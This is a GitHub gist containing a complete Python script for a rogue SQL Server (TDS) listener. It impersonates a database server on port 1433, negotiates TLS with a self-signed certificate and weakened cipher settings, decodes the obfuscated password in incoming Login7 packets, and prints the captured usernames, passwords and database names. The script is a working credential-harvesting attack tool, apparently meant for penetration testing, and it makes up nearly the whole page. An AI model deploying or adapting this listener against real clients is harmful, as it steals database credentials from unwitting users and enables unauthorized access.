Skip to content

Instantly share code, notes, and snippets.

@jimmy-ly00
Created February 16, 2026 23:01
Show Gist options
  • Select an option

  • Save jimmy-ly00/c1d757b787fae5b6f5e74cc621b72c0d to your computer and use it in GitHub Desktop.

Select an option

Save jimmy-ly00/c1d757b787fae5b6f5e74cc621b72c0d to your computer and use it in GitHub Desktop.
Rogue TDS SQL Server
"""
Rogue TDS/SQL Server - Captures SQL credentials from Login7 packets.
Implements the TDS pre-login handshake and TLS negotiation so the client
proceeds to send Login7 with credentials.
Requires: pip install cryptography
"""
import socket
import struct
import ssl
import tempfile
import os
import sys
TDS_PRELOGIN = 0x12
TDS_LOGIN7 = 0x10
# Certificate Generation
def generate_cert():
"""Generate a self-signed cert for the TLS handshake."""
try:
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from datetime import datetime, timedelta
except ImportError:
print("[!] Install cryptography: pip install cryptography")
sys.exit(1)
cert_path = os.path.join(tempfile.gettempdir(), "rogue_sql.crt")
key_path = os.path.join(tempfile.gettempdir(), "rogue_sql.key")
if os.path.exists(cert_path) and os.path.exists(key_path):
return cert_path, key_path
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, "SQLServer"),
])
cert = (
x509.CertificateBuilder()
.subject_name(subject)
.issuer_name(issuer)
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(datetime.utcnow())
.not_valid_after(datetime.utcnow() + timedelta(days=365))
.sign(key, hashes.SHA256())
)
with open(cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
with open(key_path, "wb") as f:
f.write(key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.TraditionalOpenSSL,
serialization.NoEncryption(),
))
print(f"[*] Generated cert: {cert_path}")
print(f"[*] Generated key: {key_path}")
return cert_path, key_path
# low-level helpers
def recv_exact(sock, n):
"""Receive exactly n bytes or return None."""
buf = b""
while len(buf) < n:
chunk = sock.recv(n - len(buf))
if not chunk:
return None
buf += chunk
return buf
def read_tds_packet(sock):
"""Read one TDS packet. Returns (type, status, payload) or Nones."""
hdr = recv_exact(sock, 8)
if not hdr:
return None, None, None
pkt_type = hdr[0]
status = hdr[1]
length = struct.unpack(">H", hdr[2:4])[0]
payload = recv_exact(sock, length - 8)
return pkt_type, status, payload
def build_tds_packet(pkt_type, payload, status=0x01, pkt_id=1):
"""Wrap payload in a TDS header."""
length = len(payload) + 8
hdr = struct.pack("!BBHHBB", pkt_type, status, length, 0, pkt_id, 0)
return hdr + payload
# Pre-Login
def build_prelogin_response():
"""
Build TDS Pre-Login response payload.
Sets ENCRYPTION = 0x01 (ENCRYPT_ON) so the client will proceed
with a TLS handshake and then send Login7 inside TLS.
"""
# 5 option tokens (5 bytes each) + 0xFF terminator = 26 bytes
version_data = b"\x0f\x00\x07\xd0\x00\x00" # 15.0.2000 (SQL 2019)
encrypt_data = b"\x01" # ENCRYPT_ON
instopt_data = b"\x00"
threadid_data = b"\x00\x00\x00\x00"
mars_data = b"\x00"
data_items = [
(0x00, version_data),
(0x01, encrypt_data),
(0x02, instopt_data),
(0x03, threadid_data),
(0x04, mars_data),
]
options_size = len(data_items) * 5 + 1 # 26
tokens = b""
offset = options_size
for token_id, value in data_items:
tokens += struct.pack("!BHH", token_id, offset, len(value))
offset += len(value)
tokens += b"\xff"
return tokens + version_data + encrypt_data + instopt_data + threadid_data + mars_data
# TLS handshake (TDS-wrapped)
def tds_tls_handshake(conn, ssl_ctx):
"""
Perform a TLS handshake where TLS records are wrapped inside
TDS PRELOGIN (0x12) packets, as required by the TDS protocol.
Returns (tls_object, incoming_bio, outgoing_bio).
After this, raw TLS records flow directly on the TCP socket
(no more TDS wrapping), and inside the TLS stream regular
TDS packets are sent.
"""
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
tls = ssl_ctx.wrap_bio(incoming, outgoing, server_side=True)
while True:
try:
tls.do_handshake()
# Flush any remaining TLS data
out = outgoing.read()
if out:
conn.sendall(build_tds_packet(TDS_PRELOGIN, out))
return tls, incoming, outgoing
except ssl.SSLWantReadError:
# Send whatever TLS produced so far (wrapped in TDS)
out = outgoing.read()
if out:
conn.sendall(build_tds_packet(TDS_PRELOGIN, out))
# Read the next TDS packet from the client
pkt_type, status, data = read_tds_packet(conn)
if data is None:
raise ConnectionError("Client disconnected during TLS handshake")
# Feed the TLS payload into the incoming BIO
incoming.write(data)
# Reading TDS-over-TLS
def tls_recv(conn, tls_obj, in_bio, n):
"""
Read exactly n decrypted bytes from the TLS stream.
Feeds raw data from the socket into the BIO as needed.
"""
buf = b""
while len(buf) < n:
try:
chunk = tls_obj.read(n - len(buf))
if chunk:
buf += chunk
except ssl.SSLWantReadError:
raw = conn.recv(16384)
if not raw:
return buf
in_bio.write(raw)
return buf
def read_tds_over_tls(conn, tls_obj, in_bio):
"""Read one TDS packet from inside the TLS stream."""
hdr = tls_recv(conn, tls_obj, in_bio, 8)
if not hdr or len(hdr) < 8:
return None, None, None
pkt_type = hdr[0]
status = hdr[1]
length = struct.unpack(">H", hdr[2:4])[0]
payload = tls_recv(conn, tls_obj, in_bio, length - 8)
return pkt_type, status, payload
# Login7 parsing
def decode_password(raw_bytes):
"""
Decode the obfuscated password from a Login7 packet.
TDS encoding: for each byte, swap nibbles then XOR 0xA5.
Decoding: XOR 0xA5 then swap nibbles.
"""
out = bytearray(len(raw_bytes))
for i, b in enumerate(raw_bytes):
b ^= 0xA5
b = ((b >> 4) & 0x0F) | ((b & 0x0F) << 4)
out[i] = b
return out.decode("utf-16-le", errors="replace")
def parse_login7(data):
"""Extract fields (username, password, etc.) from Login7 payload."""
if len(data) < 94:
return {}
field_defs = [
("HostName", 36),
("UserName", 40),
("Password", 44),
("AppName", 48),
("ServerName", 52),
("_unused", 56),
("InterfaceName", 60),
("Language", 64),
("Database", 68),
]
fields = {}
for name, base in field_defs:
if name.startswith("_") or base + 4 > len(data):
continue
ib = struct.unpack("<H", data[base:base + 2])[0] # byte offset
cch = struct.unpack("<H", data[base + 2:base + 4])[0] # char count
if cch == 0:
fields[name] = ""
continue
end = ib + cch * 2
if end > len(data):
continue
raw = data[ib:end]
fields[name] = decode_password(raw) if name == "Password" else raw.decode("utf-16-le", errors="replace")
return fields
# Main server loop
def main():
host = "0.0.0.0"
port = 1433
cert_path, key_path = generate_cert()
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ssl_ctx.load_cert_chain(cert_path, key_path)
try:
ssl_ctx.minimum_version = ssl.TLSVersion.TLSv1
except (AttributeError, ValueError):
pass # Older Python or restricted build
try:
ssl_ctx.set_ciphers("DEFAULT:@SECLEVEL=0")
except ssl.SSLError:
ssl_ctx.set_ciphers("DEFAULT")
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind((host, port))
srv.listen(5)
print(f"[*] Rogue SQL Server listening on {host}:{port}")
print(f"[*] Waiting for connections …\n")
count = 0
while True:
conn, addr = srv.accept()
count += 1
print(f"{'=' * 60}")
print(f"[+] Connection #{count} from {addr[0]}:{addr[1]}")
print(f"{'=' * 60}")
try:
# Step 1: Pre-Login
pkt_type, _, payload = read_tds_packet(conn)
if pkt_type != TDS_PRELOGIN:
print(f"[-] Expected Pre-Login (0x12), got 0x{pkt_type:02x}")
continue
print(f"[*] Received Pre-Login ({len(payload)} bytes)")
# Parse client encryption preference
if payload:
# Find ENCRYPTION option (token 0x01)
i = 0
while i < len(payload) and payload[i] != 0xFF:
token = payload[i]
off = struct.unpack(">H", payload[i+1:i+3])[0]
ln = struct.unpack(">H", payload[i+3:i+5])[0]
if token == 0x01 and ln == 1 and off < len(payload):
enc_names = {0: "OFF", 1: "ON", 2: "NOT_SUP", 3: "REQ"}
enc_val = payload[off]
print(f"[*] Client encryption: ENCRYPT_{enc_names.get(enc_val, '?')} (0x{enc_val:02x})")
i += 5
# Step 2: Pre-Login Response
resp = build_prelogin_response()
conn.sendall(build_tds_packet(TDS_PRELOGIN, resp))
print(f"[*] Sent Pre-Login response (ENCRYPT_ON)")
# Step 3: TLS Handshake
print(f"[*] Starting TLS handshake …")
tls, in_bio, out_bio = tds_tls_handshake(conn, ssl_ctx)
print(f"[*] TLS handshake complete ({tls.version()})")
# Step 4: Read Login7 inside TLS
pkt_type, _, l7_data = read_tds_over_tls(conn, tls, in_bio)
if pkt_type is None:
print(f"[-] No data after TLS handshake")
continue
print(f"[*] Received TDS packet type 0x{pkt_type:02x} ({len(l7_data)} bytes)")
if pkt_type == TDS_LOGIN7:
creds = parse_login7(l7_data)
print()
print(f"{'*' * 60}")
print(f" CAPTURED CREDENTIALS")
print(f"{'*' * 60}")
for k, v in creds.items():
print(f" {k:16s}: {v}")
print(f"{'*' * 60}")
print()
else:
print(f"[-] Expected Login7 (0x10), got 0x{pkt_type:02x}")
print(f" Hex preview: {l7_data[:80].hex()}")
except Exception as ex:
print(f"[-] Error: {ex}")
import traceback
traceback.print_exc()
finally:
try:
conn.close()
except Exception:
pass
print()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment